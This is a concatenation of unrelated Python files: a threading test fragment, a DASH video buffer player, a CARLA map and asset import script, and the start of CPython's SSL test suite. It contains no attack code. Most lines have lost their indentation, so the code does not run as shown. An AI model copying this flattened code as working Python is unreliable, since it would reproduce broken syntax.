def test_thread_test_1():
if not numpy_available:
pytest.skip()
threads = []
args_array = []
for i in range(4):
args_dict = {'ret': True}
t = threading.Thread(target=thread_test_1_worker, args=(args_dict,))
args_array.append(args_dict)
threads.append(t)
t.start()
    ok = True
    for i in range(4):
        threads[i].join()
        # each worker's dict is always truthy; check its 'ret' flag instead
        if not args_array[i]['ret']:
            ok = False
    # pytest ignores return values from test functions, so report failures via assert
    assert ok
|
dash_buffer.py
|
import queue
import threading
import time
import csv
import os
import config_dash
from stop_watch import StopWatch
# Durations in seconds
PLAYER_STATES = ['INITIALIZED', 'INITIAL_BUFFERING', 'PLAY',
'PAUSE', 'BUFFERING', 'STOP', 'END']
EXIT_STATES = ['STOP', 'END']
class DashPlayer:
""" DASH buffer class """
def __init__(self, video_length, segment_duration):
config_dash.LOG.info("Initializing the Buffer")
self.player_thread = None
self.playback_start_time = None
self.playback_duration = video_length
self.segment_duration = segment_duration
#print "video_length = {}".format(video_length)
#print "segment_duration = {}".format(segment_duration)
# Timers to keep track of playback time and the actual time
self.playback_timer = StopWatch()
self.actual_start_time = None
# Playback State
self.playback_state = "INITIALIZED"
self.playback_state_lock = threading.Lock()
# Buffer size
if config_dash.MAX_BUFFER_SIZE:
self.max_buffer_size = config_dash.MAX_BUFFER_SIZE
else:
self.max_buffer_size = video_length
# Duration of the current buffer
self.buffer_length = 0
self.buffer_length_lock = threading.Lock()
# Buffer Constants
self.initial_buffer = config_dash.INITIAL_BUFFERING_COUNT
self.alpha = config_dash.ALPHA_BUFFER_COUNT
self.beta = config_dash.BETA_BUFFER_COUNT
self.segment_limit = None
self.time_limit = None
# Current video buffer that holds the segment data
self.buffer = queue.Queue()
self.buffer_lock = threading.Lock()
self.current_segment = None
self.buffer_log_file = config_dash.BUFFER_LOG_FILENAME
config_dash.LOG.info("VideoLength={},segmentDuration={},MaxBufferSize={},InitialBuffer(secs)={},"
"BufferAlph(secs)={},BufferBeta(secs)={}".format(self.playback_duration,
self.segment_duration,
self.max_buffer_size, self.initial_buffer,
self.alpha, self.beta))
def set_state(self, state):
""" Function to set the state of the player"""
state = state.upper()
if state in PLAYER_STATES:
self.playback_state_lock.acquire()
config_dash.LOG.info("Changing state from {} to {} at {} Playback time ".format(self.playback_state, state,
self.playback_timer.time()))
self.playback_state = state
self.playback_state_lock.release()
else:
config_dash.LOG.error("Unidentified state: {}".format(state))
def initialize_player(self):
"""Method that update the current playback time"""
start_time = time.time()
initial_wait = 0
paused = False
buffering = False
interruption_start = None
config_dash.LOG.info("Initialized player with video length {}".format(self.playback_duration))
while True:
            # Playback has reached the end of the video
if self.playback_state == "END":
config_dash.LOG.info("Finished playback of the video: {} seconds of video played for {} seconds".format(
self.playback_duration, time.time() - start_time))
config_dash.JSON_HANDLE['playback_info']['end_time'] = time.time()
self.playback_timer.pause()
return "STOPPED"
if self.playback_state == "STOP":
# If video is stopped quit updating the playback time and exit player
config_dash.LOG.info("Player Stopped at time {}".format(
time.time() - start_time))
config_dash.JSON_HANDLE['playback_info']['end_time'] = time.time()
self.playback_timer.pause()
self.log_entry("Stopped")
return "STOPPED"
# If paused by user
if self.playback_state == "PAUSE":
if not paused:
# do not update the playback time. Wait for the state to change
config_dash.LOG.info("Player Paused after {:4.2f} seconds of playback".format(
self.playback_timer.time()))
self.playback_timer.pause()
paused = True
continue
# If the playback encounters buffering during the playback
if self.playback_state == "BUFFERING":
if not buffering:
config_dash.LOG.info("Entering buffering stage after {} seconds of playback".format(
self.playback_timer.time()))
self.playback_timer.pause()
buffering = True
interruption_start = time.time()
config_dash.JSON_HANDLE['playback_info']['interruptions']['count'] += 1
                # If the buffer holds at least RE_BUFFERING_COUNT segments, resume playback
else:
                    # If RE_BUFFERING_COUNT segments cover more than the remaining length of the video, do not wait for a full refill
remaining_playback_time = self.playback_duration - self.playback_timer.time()
if ((self.buffer.qsize() >= config_dash.RE_BUFFERING_COUNT) or (
config_dash.RE_BUFFERING_COUNT * self.segment_duration >= remaining_playback_time
and self.buffer.qsize() > 0)):
buffering = False
if interruption_start:
interruption_end = time.time()
interruption = interruption_end - interruption_start
config_dash.JSON_HANDLE['playback_info']['interruptions']['events'].append({
"timeframe": (interruption_start, interruption_end),
"segment_number": self.current_segment['segment_number'],
})
config_dash.JSON_HANDLE['playback_info']['interruptions']['total_duration'] += interruption
config_dash.LOG.info("Duration of interruption = {}".format(interruption))
interruption_start = None
self.set_state("PLAY")
self.log_entry("Buffering-Play")
if self.playback_state == "INITIAL_BUFFERING":
if self.buffer.qsize() < config_dash.INITIAL_BUFFERING_COUNT:
initial_wait = time.time() - start_time
continue
else:
config_dash.LOG.info("Initial Waiting Time = {}".format(initial_wait))
config_dash.JSON_HANDLE['playback_info']['initial_buffering_duration'] = initial_wait
config_dash.JSON_HANDLE['playback_info']['start_time'] = time.time()
self.set_state("PLAY")
self.log_entry("InitialBuffering-Play")
if self.playback_state == "PLAY":
                # Check if the buffer has any segments
                if self.playback_timer.time() >= self.playback_duration:
self.set_state("END")
self.log_entry("Play-End")
if self.buffer.qsize() == 0:
config_dash.LOG.info("Buffer empty after {} seconds of playback".format(
self.playback_timer.time()))
self.playback_timer.pause()
self.set_state("BUFFERING")
self.log_entry("Play-Buffering")
continue
                # Read one segment from the buffer
# Acquire Lock on the buffer and read a segment for it
self.buffer_lock.acquire()
play_segment = self.buffer.get()
self.current_segment = play_segment
self.buffer_lock.release()
config_dash.LOG.info("Reading the segment number {} with length {} from the buffer at playtime {}".format(
play_segment['segment_number'], play_segment["playback_length"], self.playback_timer.time()))
self.log_entry(action="StillPlaying", bitrate=play_segment["bitrate"])
                # Calculate the playback time at which the segment will finish
future = self.playback_timer.time() + play_segment['playback_length']
# Start the playback
self.playback_timer.start()
while self.playback_timer.time() < future:
# If playback hasn't started yet, set the playback_start_time
if not self.playback_start_time:
self.playback_start_time = time.time()
config_dash.LOG.info("Started playing with representation {} at {}".format(
play_segment['bitrate'], self.playback_timer.time()))
# Duration for which the video was played in seconds (integer)
if self.playback_timer.time() >= self.playback_duration:
config_dash.LOG.info("Completed the video playback: {} seconds".format(
self.playback_duration))
self.playback_timer.pause()
self.set_state("END")
self.log_entry("TheEnd")
return
else:
self.buffer_length_lock.acquire()
self.buffer_length -= play_segment['playback_length']
config_dash.LOG.debug("Decrementing buffer_length by {}. dash_buffer = {}".format(
play_segment['playback_length'], self.buffer_length))
self.buffer_length_lock.release()
if self.segment_limit:
if int(play_segment['segment_number']) >= self.segment_limit:
self.set_state("STOP")
config_dash.LOG.info("Stopped playback after segment {} at playtime {}".format(
                        play_segment['segment_number'], self.playback_timer.time()))
if self.time_limit is not None:
if self.playback_timer.time() >= self.time_limit:
self.set_state("STOP")
config_dash.LOG.info("Stopped playback after segment {} at playtime {}".format(
                        play_segment['segment_number'], self.playback_timer.time()))
def write(self, segment):
""" write segment to the buffer.
Segment is dict with keys ['data', 'bitrate', 'playback_length', 'URI', 'size']
"""
# Acquire Lock on the buffer and add a segment to it
if not self.actual_start_time:
self.actual_start_time = time.time()
config_dash.JSON_HANDLE['playback_info']['start_time'] = self.actual_start_time
config_dash.LOG.info("Writing segment {} at time {}".format(segment['segment_number'],
time.time() - self.actual_start_time))
self.buffer_lock.acquire()
self.buffer.put(segment)
self.buffer_lock.release()
self.buffer_length_lock.acquire()
self.buffer_length += segment['playback_length']
config_dash.LOG.debug("Incrementing buffer_length by {}. dash_buffer = {}".format(
segment['playback_length'], self.buffer_length))
self.buffer_length_lock.release()
self.log_entry(action="Writing", bitrate=segment['bitrate'])
def start(self):
""" Start playback"""
self.set_state("INITIAL_BUFFERING")
self.log_entry("Starting")
config_dash.LOG.info("Starting the Player")
self.player_thread = threading.Thread(target=self.initialize_player)
self.player_thread.daemon = True
self.player_thread.start()
self.log_entry(action="Starting")
def stop(self):
"""Method to stop the playback"""
self.set_state("STOP")
self.log_entry("Stopped")
config_dash.LOG.info("Stopped the playback")
def log_entry(self, action, bitrate=0):
"""Method to log the current state"""
if self.buffer_log_file:
header_row = None
if self.actual_start_time:
log_time = time.time() - self.actual_start_time
else:
log_time = 0
            if not os.path.exists(self.buffer_log_file):
                header_row = "EpochTime,CurrentPlaybackTime,CurrentBufferSize,CurrentPlaybackState,Action,Bitrate".split(",")
            stats = (log_time, str(self.playback_timer.time()), self.buffer.qsize(),
                     self.playback_state, action, bitrate)
str_stats = [str(i) for i in stats]
with open(self.buffer_log_file, "a") as log_file_handle:
result_writer = csv.writer(log_file_handle, delimiter=",")
if header_row:
result_writer.writerow(header_row)
result_writer.writerow(str_stats)
config_dash.LOG.info("BufferStats: EpochTime=%s,CurrentPlaybackTime=%s,CurrentBufferSize=%s,"
"CurrentPlaybackState=%s,Action=%s,Bitrate=%s" % tuple(str_stats))
|
Import.py
|
#!/usr/bin/env python
# Copyright (c) 2019 Computer Vision Center (CVC) at the Universitat Autonoma de
# Barcelona (UAB).
#
# This work is licensed under the terms of the MIT license.
# For a copy, see <https://opensource.org/licenses/MIT>.
"""Import Assets to Carla"""
from __future__ import print_function
import errno
import fnmatch
import json
import os
import shutil
import subprocess
import argparse
import threading
# Global variables
IMPORT_SETTING_FILENAME = "importsetting.json"
SCRIPT_NAME = os.path.basename(__file__)
SCRIPT_DIR = os.path.dirname(os.path.realpath(__file__))
# Go two directories above the current script
CARLA_ROOT_PATH = os.path.normpath(SCRIPT_DIR + '/../..')
def get_packages_json_list(folder):
"""Returns a list with the paths of each package's json
    files that have been found recursively in the input folder.
"""
json_files = []
for root, _, filenames in os.walk(folder):
for filename in fnmatch.filter(filenames, "*.json"):
if filename != "roadpainter_decals.json":
json_files.append([root, filename])
return json_files
def get_decals_json_file(folder):
for root, _, filenames in os.walk(folder):
for filename in fnmatch.filter(filenames, "roadpainter_decals.json"):
return filename
return ""
def generate_json_package(folder, package_name, use_carla_materials):
"""Generate a .json file with all the maps it founds on the folder
and subfolders. A map is a .fbx and a .xodr with the same name.
"""
json_files = []
# search for all .fbx and .xodr pair of files
maps = []
for root, _, filenames in os.walk(folder):
files = fnmatch.filter(filenames, "*.xodr")
for file_name in files:
xodr = file_name[:-5]
            # check if the .fbx file exists
if os.path.exists("%s/%s.fbx" % (root, xodr)):
maps.append([os.path.relpath(root, folder), xodr, ["%s.fbx" % xodr]])
else:
                # check if the map exists as tiles
tiles = fnmatch.filter(filenames, "*_Tile_*.fbx")
if (len(tiles) > 0):
maps.append([os.path.relpath(root, folder), xodr, tiles])
# write the json
if (len(maps) > 0):
# build all the maps in .json format
json_maps = []
for map_name in maps:
path = map_name[0].replace('\\', '/')
name = map_name[1]
tiles = map_name[2]
tiles = ["%s/%s" % (path, x) for x in tiles]
map_dict = {
'name': name,
'xodr': '%s/%s.xodr' % (path, name),
'use_carla_materials': use_carla_materials
}
# check for only one 'source' or map in 'tiles'
if (len(tiles) == 1):
map_dict['source'] = tiles[0]
else:
map_dict['tile_size'] = 2000
map_dict['tiles'] = tiles
# write
json_maps.append(map_dict)
# build and write the .json
f = open("%s/%s.json" % (folder, package_name), "w")
my_json = {'maps': json_maps, 'props': []}
serialized = json.dumps(my_json, sort_keys=False, indent=3)
f.write(serialized)
f.close()
# add
json_files.append([folder, "%s.json" % package_name])
return json_files
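# For reference, a sketch of the <package_name>.json this produces (map names and paths
# below are hypothetical):
#   {
#      "maps": [
#         {"name": "TownX", "xodr": "TownX/TownX.xodr",
#          "use_carla_materials": true, "source": "TownX/TownX.fbx"},
#         {"name": "BigMap", "xodr": "BigMap/BigMap.xodr", "use_carla_materials": true,
#          "tile_size": 2000, "tiles": ["BigMap/BigMap_Tile_0_0.fbx", "BigMap/BigMap_Tile_0_1.fbx"]}
#      ],
#      "props": []
#   }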
def generate_decals_file(folder):
# search for all .fbx and .xodr pair of files
maps = []
for root, _, filenames in os.walk(folder):
files = fnmatch.filter(filenames, "*.xodr")
for file_name in files:
xodr = file_name[:-5]
            # check if the .fbx file exists
if os.path.exists("%s/%s.fbx" % (root, xodr)):
maps.append([os.path.relpath(root, folder), xodr, ["%s.fbx" % xodr]])
else:
                # check if the map exists as tiles
tiles = fnmatch.filter(filenames, "*_Tile_*.fbx")
if (len(tiles) > 0):
maps.append([os.path.relpath(root, folder), xodr, tiles])
if (len(maps) > 0):
# build all the maps in .json format
json_decals = []
for map_name in maps:
name = map_name[1]
            # create the default decals config file
json_decals.append({
'map_name' : name,
'drip1': '10',
'drip3': '10',
'dirt1': '10',
'dirt3' : '10',
'dirt4' : '10',
'dirt5': '10',
'roadline1': '20',
'roadline5': '20',
'tiremark1': '20',
'tiremark3': '20',
'tarsnake1': '10',
'tarsnake3': '20',
'tarsnake4': '10',
'tarsnake5': '20',
'tarsnake11': '20',
'cracksbig1': '10',
'cracksbig3': '10',
'cracksbig5': '10',
'cracksbig8': '10',
'mud1' : '10',
'mud5' : '10',
'oilsplat1' : '20',
'oilsplat2' : '20',
'oilsplat3' : '20',
'oilsplat4' : '20',
'oilsplat5' : '20',
'gum' : '30',
'crack1': '10',
'crack3' : '10',
'crack4' : '10',
'crack5' : '10',
'crack8': '10',
'decal_scale' : {
'x_axis' : '1.0',
'y_axis' : '1.0',
'z_axis' : '1.0'},
'fixed_decal_offset': {
'x_axis' : '15.0',
'y_axis' : '15.0',
'z_axis' : '0.0'},
'decal_min_scale' : '0.3',
'decal_max_scale' : '0.7',
'decal_random_yaw' : '360.0',
'random_offset' : '50.0'
            })
# build and write the .json
f = open("%s/%s.json" % (folder, 'roadpainter_decals'), "w")
my_json = {'decals': json_decals}
serialized = json.dumps(my_json, sort_keys=False, indent=3)
f.write(serialized)
f.close()
def invoke_commandlet(name, arguments):
"""Generic function for running a commandlet with its arguments."""
ue4_path = os.environ["UE4_ROOT"]
uproject_path = os.path.join(CARLA_ROOT_PATH, "Unreal", "CarlaUE4", "CarlaUE4.uproject")
run = "-run=%s" % (name)
if os.name == "nt":
sys_name = "Win64"
editor_path = "%s/Engine/Binaries/%s/UE4Editor" % (ue4_path, sys_name)
command = [editor_path, uproject_path, run]
command.extend(arguments)
print("Commandlet:", command)
subprocess.check_call(command, shell=True)
elif os.name == "posix":
sys_name = "Linux"
editor_path = "%s/Engine/Binaries/%s/UE4Editor" % (ue4_path, sys_name)
full_command = "%s %s %s %s" % (editor_path, uproject_path, run, " ".join(arguments))
print("Commandlet:", full_command)
subprocess.call([full_command], shell=True)
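# Roughly, on Linux the call above expands to something like (paths are hypothetical):
#   $UE4_ROOT/Engine/Binaries/Linux/UE4Editor \
#       $CARLA_ROOT/Unreal/CarlaUE4/CarlaUE4.uproject \
#       -run=ImportAssets -importSettings="/path/to/importsetting.json" \
#       -nosourcecontrol -replaceexisting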
def generate_import_setting_file(package_name, json_dirname, props, maps, do_tiles, tile_size):
"""Creates the PROPS and MAPS import_setting.json file needed
as an argument for using the ImportAssets commandlet
"""
importfile = os.path.join(os.getcwd(), IMPORT_SETTING_FILENAME)
if os.path.exists(importfile):
os.remove(importfile)
with open(importfile, "w+") as fh:
import_groups = []
file_names = []
import_settings = {
"bImportMesh": 1,
"bConvertSceneUnit": 1,
"bConvertScene": 1,
"bCombineMeshes": 1,
"bImportTextures": 1,
"bImportMaterials": 1,
"bRemoveDegenerates": 1,
"AnimSequenceImportData": {},
"SkeletalMeshImportData": {},
"TextureImportData": {},
"StaticMeshImportData": {
"bRemoveDegenerates": 1,
"bAutoGenerateCollision": 1,
"bCombineMeshes": 0,
"bConvertSceneUnit": 1,
"bForceVerticesRelativeToTile": do_tiles,
"TileSize": tile_size
}
}
for prop in props:
props_dest = "/" + "/".join(["Game", package_name, "Static", prop["tag"], prop["name"]])
file_names = [os.path.join(json_dirname, prop["source"])]
import_groups.append({
"ImportSettings": import_settings,
"FactoryName": "FbxFactory",
"DestinationPath": props_dest,
"bReplaceExisting": "true",
"FileNames": file_names
})
for umap in maps:
maps_dest = "/" + "/".join(["Game", package_name, "Maps", umap["name"]])
if "source" in umap:
tiles = [os.path.join(json_dirname, umap["source"])]
else:
tiles = ["%s" % (os.path.join(json_dirname, x)) for x in umap["tiles"]]
import_groups.append({
"ImportSettings": import_settings,
"FactoryName": "FbxFactory",
"DestinationPath": maps_dest,
"bReplaceExisting": "true",
"FileNames": tiles
})
fh.write(json.dumps({"ImportGroups": import_groups}))
return importfile
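# Sketch of the generated importsetting.json: one ImportGroup per prop plus one per map,
# all sharing the same ImportSettings block (destination path and file names below are
# hypothetical):
#   {"ImportGroups": [
#      {"ImportSettings": {...}, "FactoryName": "FbxFactory",
#       "DestinationPath": "/Game/map_package/Static/SomeTag/SomeProp",
#       "bReplaceExisting": "true", "FileNames": ["/path/to/Import/SomeProp.fbx"]}
#   ]}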
def generate_package_file(package_name, props, maps):
"""Creates the PackageName.Package.json file for the package."""
output_json = {}
output_json["props"] = []
for prop in props:
name = prop["name"]
size = prop["size"]
source_name = os.path.basename(prop["source"]).split('.')
if len(source_name) < 2:
print("[Warning] File name '" + prop["source"] + "' contains multiple dots ('.')")
source_name = '.'.join([source_name[0], source_name[0]])
path = "/" + "/".join(["Game", package_name, "Static", prop["tag"], prop["name"], source_name])
output_json["props"].append({
"name": name,
"path": path,
"size": size,
})
output_json["maps"] = []
for umap in maps:
path = "/" + "/".join(["Game", package_name, "Maps", umap["name"]])
use_carla_materials = umap["use_carla_materials"] if "use_carla_materials" in umap else False
output_json["maps"].append({
"name": umap["name"],
"path": path,
"use_carla_materials": use_carla_materials
})
package_config_path = os.path.join(CARLA_ROOT_PATH, "Unreal", "CarlaUE4", "Content", package_name, "Config")
if not os.path.exists(package_config_path):
try:
os.makedirs(package_config_path)
except OSError as exc:
if exc.errno != errno.EEXIST:
raise
with open(os.path.join(package_config_path, package_name + ".Package.json"), "w+") as fh:
json.dump(output_json, fh, indent=4)
def copy_roadpainter_config_files(package_name):
"""Copies roadpainter configuration files into Unreal content folder"""
two_directories_up = os.path.dirname(os.path.dirname(os.path.dirname(__file__)))
final_path = os.path.join(two_directories_up, "Import", "roadpainter_decals.json")
package_config_path = os.path.join(CARLA_ROOT_PATH, "Unreal", "CarlaUE4", "Content", package_name, "Config")
if not os.path.exists(package_config_path):
try:
os.makedirs(package_config_path)
except OSError as exc:
if exc.errno != errno.EEXIST:
raise
shutil.copy(final_path, package_config_path)
def import_assets(package_name, json_dirname, props, maps, do_tiles, tile_size):
"""Same commandlet is used for importing assets and also maps."""
commandlet_name = "ImportAssets"
# Import Props
import_setting_file = generate_import_setting_file(package_name, json_dirname, props, maps, do_tiles, tile_size)
commandlet_arguments = ["-importSettings=\"%s\"" % import_setting_file, "-nosourcecontrol", "-replaceexisting"]
invoke_commandlet(commandlet_name, commandlet_arguments)
os.remove(import_setting_file)
# Move maps XODR files if any
for umap in maps:
# Make sure XODR info is full and the file exists
if "xodr" in umap and umap["xodr"] and os.path.isfile(os.path.join(json_dirname, umap["xodr"])):
            # Make sure the `.xodr` file has the same name as the `.umap`
xodr_path = os.path.abspath(os.path.join(json_dirname, umap["xodr"]))
umap_name = umap["name"]
xodr_name = '.'.join([umap_name, "xodr"])
xodr_folder_destin = os.path.join(
CARLA_ROOT_PATH,
"Unreal",
"CarlaUE4",
"Content",
package_name,
"Maps",
umap_name,
"OpenDrive")
if not os.path.exists(xodr_folder_destin):
os.makedirs(xodr_folder_destin)
xodr_path_destin = os.path.join(
xodr_folder_destin,
xodr_name)
print('Copying "' + xodr_path + '" to "' + xodr_path_destin + '"')
shutil.copy2(xodr_path, xodr_path_destin)
# Create package file
generate_package_file(package_name, props, maps)
def import_assets_from_json_list(json_list):
maps = []
package_name = ""
for dirname, filename in json_list:
# Read json file
with open(os.path.join(dirname, filename)) as json_file:
data = json.load(json_file)
        # Take all the FBX files registered in the provided json files
        # and place them inside Unreal at the path given by each json file
maps = []
props = []
if "maps" in data:
maps = data["maps"]
if "props" in data:
props = data["props"]
if "tile_size" in maps[0]:
tile_size = maps[0]["tile_size"]
else:
tile_size = 2000
package_name = filename.replace(".json", "")
# we need to build the binary file for navigation of pedestrians
thr = threading.Thread(target=build_binary_for_navigation, args=(package_name, dirname, maps,))
thr.start()
if ("tiles" in maps[0]):
import_assets(package_name, dirname, props, maps, 1, tile_size)
else:
import_assets(package_name, dirname, props, maps, 0, 0)
if not package_name:
print("No Packages JSONs found, nothing to import. Skipping package.")
continue
# First we only move the meshes to the tagged folders for semantic segmentation
move_assets_commandlet(package_name, maps)
# We prepare only the maps for cooking after moving them. Props cooking will be done from Package.sh script.
if len(maps) > 0:
prepare_maps_commandlet_for_cooking(package_name, only_prepare_maps=True)
load_asset_materials_commandlet(package_name)
thr.join()
def load_asset_materials_commandlet(package_name):
commandlet_name = "LoadAssetMaterials"
commandlet_arguments = ["-PackageName=%s" % package_name]
invoke_commandlet(commandlet_name, commandlet_arguments)
def prepare_maps_commandlet_for_cooking(package_name, only_prepare_maps):
commandlet_name = "PrepareAssetsForCooking"
commandlet_arguments = ["-PackageName=%s" % package_name]
commandlet_arguments.append("-OnlyPrepareMaps=%d" % only_prepare_maps)
invoke_commandlet(commandlet_name, commandlet_arguments)
def move_assets_commandlet(package_name, maps):
commandlet_name = "MoveAssets"
commandlet_arguments = ["-PackageName=%s" % package_name]
umap_names = ""
for umap in maps:
umap_names += umap["name"] + " "
commandlet_arguments.append("-Maps=%s" % umap_names)
invoke_commandlet(commandlet_name, commandlet_arguments)
# build the binary file for navigation of pedestrians for that map
def build_binary_for_navigation(package_name, dirname, maps):
folder = os.path.join(CARLA_ROOT_PATH, "Util", "DockerUtils", "dist")
# process each map
for umap in maps:
# get the sources for the map (single or tiles)
if ("source" in umap):
tiles = [umap["source"]]
elif ("tiles" in umap):
tiles = umap["tiles"]
else:
continue
# get the target name
target_name = umap["name"]
xodr_filename = os.path.basename(umap["xodr"])
# copy the XODR file into docker utils folder
if "xodr" in umap and umap["xodr"] and os.path.isfile(os.path.join(dirname, umap["xodr"])):
            # Make sure the `.xodr` file has the same name as the `.umap`
xodr_path_source = os.path.abspath(os.path.join(dirname, umap["xodr"]))
xodr_path_target = os.path.join(folder, xodr_filename)
# copy
print('Copying "' + xodr_path_source + '" to "' + xodr_path_target + '"')
shutil.copy2(xodr_path_source, xodr_path_target)
for tile in tiles:
fbx_filename = os.path.basename(tile)
fbx_name_no_ext = os.path.splitext(fbx_filename)[0]
# copy the FBX file into docker utils folder
if os.path.isfile(os.path.join(dirname, tile)):
                # Make sure the `.fbx` file has the same name as the `.umap`
fbx_path_source = os.path.abspath(os.path.join(dirname, tile))
fbx_path_target = os.path.join(folder, fbx_filename)
# copy
print('Copying "' + fbx_path_source + '" to "' + fbx_path_target + '"')
shutil.copy2(fbx_path_source, fbx_path_target)
# rename the xodr with the same name of the source/tile
# os.rename(os.path.join(folder, xodr_filename), os.path.join(folder, "%s.xodr" % fbx_name_no_ext))
# make the conversion
if os.name == "nt":
subprocess.call(["build.bat", fbx_name_no_ext, xodr_filename], cwd=folder, shell=True)
else:
subprocess.call(["chmod +x build.sh"], cwd=folder, shell=True)
subprocess.call("./build.sh %s %s" % (fbx_name_no_ext, xodr_filename), cwd=folder, shell=True)
# rename the xodr with the original name
# os.rename(os.path.join(folder, "%s.xodr" % fbx_name_no_ext), os.path.join(folder, xodr_filename))
# copy the binary file
nav_path_source = os.path.join(folder, "%s.bin" % fbx_name_no_ext)
nav_folder_target = os.path.join(CARLA_ROOT_PATH, "Unreal", "CarlaUE4", "Content", package_name, "Maps", target_name, "Nav")
if os.path.exists(nav_path_source):
if not os.path.exists(nav_folder_target):
os.makedirs(nav_folder_target)
nav_path_target = os.path.join(nav_folder_target, "%s.bin" % fbx_name_no_ext)
print('Copying "' + nav_path_source + '" to "' + nav_path_target + '"')
shutil.copy2(nav_path_source, nav_path_target)
# remove files
if os.path.exists(nav_path_source):
os.remove(nav_path_source)
if os.path.exists(fbx_path_target):
os.remove(fbx_path_target)
os.remove(xodr_path_target)
def main():
argparser = argparse.ArgumentParser(description=__doc__)
argparser.add_argument(
'--package',
metavar='P',
default='map_package',
help='Name of the imported package')
argparser.add_argument(
'--no-carla-materials',
action='store_false',
        help='do not use Carla materials')
argparser.add_argument(
'--json-only',
action='store_true',
help='Create JSON files only')
args = argparser.parse_known_args()[0]
import_folder = os.path.join(CARLA_ROOT_PATH, "Import")
json_list = get_packages_json_list(import_folder)
decals_json = get_decals_json_file(import_folder)
if len(json_list) < 1:
json_list = generate_json_package(import_folder, args.package, args.no_carla_materials)
if len(decals_json) == 0:
        generate_decals_file(import_folder)
    if not args.json_only:
copy_roadpainter_config_files(args.package)
import_assets_from_json_list(json_list)
if __name__ == '__main__':
main()
|
test_ssl.py
|
# Test the support for SSL and sockets
import sys
import unittest
from test import support
import socket
import select
import time
import datetime
import gc
import os
import errno
import pprint
import urllib.request
import threading
import traceback
import asyncore
import weakref
import platform
import functools
import sysconfig
try:
import ctypes
except ImportError:
ctypes = None
ssl = support.import_module("ssl")
PROTOCOLS = sorted(ssl._PROTOCOL_NAMES)
HOST = support.HOST
IS_LIBRESSL = ssl.OPENSSL_VERSION.startswith('LibreSSL')
IS_OPENSSL_1_1_0 = not IS_LIBRESSL and ssl.OPENSSL_VERSION_INFO >= (1, 1, 0)
IS_OPENSSL_1_1_1 = not IS_LIBRESSL and ssl.OPENSSL_VERSION_INFO >= (1, 1, 1)
PY_SSL_DEFAULT_CIPHERS = sysconfig.get_config_var('PY_SSL_DEFAULT_CIPHERS')
def data_file(*name):
return os.path.join(os.path.dirname(__file__), *name)
# The custom key and certificate files used in test_ssl are generated
# using Lib/test/make_ssl_certs.py.
# Other certificates are simply fetched from the Internet servers they
# are meant to authenticate.
CERTFILE = data_file("keycert.pem")
BYTES_CERTFILE = os.fsencode(CERTFILE)
ONLYCERT = data_file("ssl_cert.pem")
ONLYKEY = data_file("ssl_key.pem")
BYTES_ONLYCERT = os.fsencode(ONLYCERT)
BYTES_ONLYKEY = os.fsencode(ONLYKEY)
CERTFILE_PROTECTED = data_file("keycert.passwd.pem")
ONLYKEY_PROTECTED = data_file("ssl_key.passwd.pem")
KEY_PASSWORD = "somepass"
CAPATH = data_file("capath")
BYTES_CAPATH = os.fsencode(CAPATH)
CAFILE_NEURONIO = data_file("capath", "4e1295a3.0")
CAFILE_CACERT = data_file("capath", "5ed36f99.0")
WRONG_CERT = data_file("wrongcert.pem")
CERTFILE_INFO = {
'issuer': ((('countryName', 'XY'),),
(('localityName', 'Castle Anthrax'),),
(('organizationName', 'Python Software Foundation'),),
(('commonName', 'localhost'),)),
'notAfter': 'Jan 17 19:09:06 2028 GMT',
'notBefore': 'Jan 19 19:09:06 2018 GMT',
'serialNumber': 'F9BA076D5B6ABD9B',
'subject': ((('countryName', 'XY'),),
(('localityName', 'Castle Anthrax'),),
(('organizationName', 'Python Software Foundation'),),
(('commonName', 'localhost'),)),
'subjectAltName': (('DNS', 'localhost'),),
'version': 3
}
# empty CRL
CRLFILE = data_file("revocation.crl")
# Two keys and certs signed by the same CA (for SNI tests)
SIGNED_CERTFILE = data_file("keycert3.pem")
SIGNED_CERTFILE_HOSTNAME = 'localhost'
SIGNED_CERTFILE_INFO = {
'OCSP': ('http://testca.pythontest.net/testca/ocsp/',),
'caIssuers': ('http://testca.pythontest.net/testca/pycacert.cer',),
'crlDistributionPoints': ('http://testca.pythontest.net/testca/revocation.crl',),
'issuer': ((('countryName', 'XY'),),
(('organizationName', 'Python Software Foundation CA'),),
(('commonName', 'our-ca-server'),)),
'notAfter': 'Nov 28 19:09:06 2027 GMT',
'notBefore': 'Jan 19 19:09:06 2018 GMT',
'serialNumber': '82EDBF41C880919C',
'subject': ((('countryName', 'XY'),),
(('localityName', 'Castle Anthrax'),),
(('organizationName', 'Python Software Foundation'),),
(('commonName', 'localhost'),)),
'subjectAltName': (('DNS', 'localhost'),),
'version': 3
}
SIGNED_CERTFILE2 = data_file("keycert4.pem")
SIGNED_CERTFILE2_HOSTNAME = 'fakehostname'
SIGNED_CERTFILE_ECC = data_file("keycertecc.pem")
SIGNED_CERTFILE_ECC_HOSTNAME = 'localhost-ecc'
# Same certificate as pycacert.pem, but without extra text in file
SIGNING_CA = data_file("capath", "ceff1710.0")
# cert with all kinds of subject alt names
ALLSANFILE = data_file("allsans.pem")
IDNSANSFILE = data_file("idnsans.pem")
REMOTE_HOST = "self-signed.pythontest.net"
EMPTYCERT = data_file("nullcert.pem")
BADCERT = data_file("badcert.pem")
NONEXISTINGCERT = data_file("XXXnonexisting.pem")
BADKEY = data_file("badkey.pem")
NOKIACERT = data_file("nokia.pem")
NULLBYTECERT = data_file("nullbytecert.pem")
DHFILE = data_file("dh1024.pem")
BYTES_DHFILE = os.fsencode(DHFILE)
# Not defined in all versions of OpenSSL
OP_NO_COMPRESSION = getattr(ssl, "OP_NO_COMPRESSION", 0)
OP_SINGLE_DH_USE = getattr(ssl, "OP_SINGLE_DH_USE", 0)
OP_SINGLE_ECDH_USE = getattr(ssl, "OP_SINGLE_ECDH_USE", 0)
OP_CIPHER_SERVER_PREFERENCE = getattr(ssl, "OP_CIPHER_SERVER_PREFERENCE", 0)
OP_ENABLE_MIDDLEBOX_COMPAT = getattr(ssl, "OP_ENABLE_MIDDLEBOX_COMPAT", 0)
def handle_error(prefix):
exc_format = ' '.join(traceback.format_exception(*sys.exc_info()))
if support.verbose:
sys.stdout.write(prefix + exc_format)
def can_clear_options():
# 0.9.8m or higher
return ssl._OPENSSL_API_VERSION >= (0, 9, 8, 13, 15)
def no_sslv2_implies_sslv3_hello():
# 0.9.7h or higher
return ssl.OPENSSL_VERSION_INFO >= (0, 9, 7, 8, 15)
def have_verify_flags():
# 0.9.8 or higher
return ssl.OPENSSL_VERSION_INFO >= (0, 9, 8, 0, 15)
def _have_secp_curves():
if not ssl.HAS_ECDH:
return False
